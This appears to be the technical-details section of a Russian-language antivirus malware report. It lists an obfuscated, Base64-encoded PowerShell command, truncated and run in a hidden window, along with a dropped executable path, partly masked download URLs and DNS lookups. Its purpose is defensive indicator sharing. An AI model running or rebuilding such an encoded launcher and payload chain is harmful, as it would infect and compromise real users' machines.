Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkADYANAAyAHcANQAgAD0AIAAgAFsAdAB5AHAARQBdACgAIgB7ADUAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBGACcASQAnACwAJwBPAFIAeQAnACwAJwAuAGQAaQByAEUAYwBUACcALAAnAE8AJw...
- %HOMEPATH%\wnwr63a\jmkyxl3\yh9sb_wff.exe
- %HOMEPATH%\wnwr63a\jmkyxl3\yh9sb_wff.exe
- http://ha###life.com/sitepage/GY/
- http://ad####yeezy.store/welph/m/
- http://ec####s.treegle.org/how-to/2V/
- http://qu####owtowing.com/wp-content/mu-plugins/uMM/
- DNS ASK ha###life.com
- DNS ASK an####ceramics.com
- DNS ASK mo####sharma.info
- DNS ASK ad####yeezy.store
- DNS ASK ec####s.treegle.org
- DNS ASK qu####owtowing.com
- DNS ASK ti###nntag.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkADYANAAyAHcANQAgAD0AIAAgAFsAdAB5AHAARQBdACgAIgB7ADUAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBGACcASQAnACwAJwBPAFIAeQAnACwAJwAuAGQAaQByAEUAYwBUACcALAAnAE8AJw...' (со скрытым окном)